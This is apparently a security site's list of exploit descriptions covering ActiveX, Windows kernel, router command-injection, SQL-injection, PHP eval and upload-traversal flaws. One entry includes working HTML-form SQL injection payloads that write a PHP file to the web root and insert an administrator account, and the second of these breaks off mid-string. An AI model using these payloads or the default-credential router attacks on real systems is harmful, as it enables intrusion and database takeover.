The WebPartHelper ActiveX control in SIEMENS Solid Edge ST4/ST5 is vulnerable to remote command execution due to a ShellExecuteExW() call inside RFMSsvs.dll. By passing an null session share path to the URL argument of the OpenInEditor() method, an attacker can launch an arbitrary executable.
This exploit uses a cycle trick to turn it into an arbitrary write. A watchdog thread is created to patch the list atomically when ready. The exploit is triggered when the main thread is stuck in a call to FlattenPath(), and the kernel is spinning in EPATHOBJ::bFlatten(). The list is then patched to point to the exploit.
Some D-Link Routers are vulnerable to an authenticated OS command injection on their web interface, where default credentials are admin/admin or admin/password. Since it is a blind os command injection vulnerability, there is no output for the executed command when using the cmd generic payload. This module was tested against a DIR-615 hardware revision H1 - firmware version 8.04. A ping command against a controlled system could be used for testing purposes. The exploit uses the wget client from the device to convert the command injection into an arbitrary payload execution.
Some Linksys Routers are vulnerable to an authenticated OS command injection on their web interface where default credentials are admin/admin or admin/password. Since it is a blind OS command injection vulnerability, there is no output for the executed command when using the cmd generic payload. This module has been tested on a Linksys WRT160n version 2 - firmware version v2.0.03. A ping command against a controlled system could be used for testing purposes. The exploit uses the tftp client from the device to stage to native payloads from the command injection.
This exploit allows an attacker to execute arbitrary SQL queries on the vulnerable Kimai 0.9.2.1306-3 application. It does not require authentication to the web app, as the file is accessible to any user. The attacker can modify paths accordingly if running against Windows.
The WordPress ProPlayer Plugin is vulnerable to a SQL Injection vulnerability. An attacker can exploit this vulnerability by sending a maliciously crafted HTTP request to the vulnerable server. This can allow the attacker to gain access to the database and execute arbitrary SQL commands.
ZPanel uses a poor templater system that consists of a few str_replace calls and an eval, which does a very poor job at preventing malicious code. By effectively injecting the replacement that occurs in line 71, one can run arbitrary PHP code. When combined with ZPanels `zsudo` binary, one can execute arbitrary commands as root, with a maximum of 5 additional arguments.
The vulnerability exists due to insufficient filtration of "src" and "username" HTTP GET parameters passed to "/index.php" script. A remote unauthenticated attacker can execute arbitrary SQL commands in application's database. Depending on database and system configuration, the PoC (Proof-of-Concept) code below will create a "/var/www/file.php" file with PHP function 'phpinfo()': <form action="http://[host]/index.php" method="post" name="main"><input type="hidden" name="action" value="login"><input type="hidden" name="int" value="1"><input type="hidden" name="module" value="login"><input type="hidden" name="password" value="password"><input type="hidden" name="src" value="' UNION SELECT '<? phpinfo(); ?>' INTO OUTFILE '/var/www/file.php' -- "><input type="hidden" name="username" value="' UNION SELECT '<? phpinfo(); ?>' INTO OUTFILE '/var/www/file.php' -- "><input type="submit" id="btn"></form> The second PoC will attempt to creaate a new administrative user with username "hacker" and password "hacker": <form action="http://[host]/index.php" method="post" name="main"><input type="hidden" name="action" value="login"><input type="hidden" name="int" value="1"><input type="hidden" name="module" value="login"><input type="hidden" name="password" value="password"><input type="hidden" name="src" value="' UNION SELECT 'INSERT INTO users (username, password, is_admin) VALUES ("hacker""
This module exploits a code execution flaw in the Mutiny 5 appliance. The EditDocument servlet provides a file upload function to authenticated users. A directory traversal vulnerability in the same functionality allows for arbitrary file upload, which results in arbitrary code execution with root privileges. In order to exploit the vulnerability a valid user (any role) in the web frontend is required. The module has been tested successfully on the Mutiny 5.0-1.07 appliance.
This exploit is a proof of concept for a denial of service vulnerability in nginx versions 1.3.9-1.4.0. The vulnerability is caused by a flaw in the way nginx handles chunked transfer encoding requests. By sending a specially crafted request with a large chunk size, an attacker can cause the nginx process to crash.
Services By CQR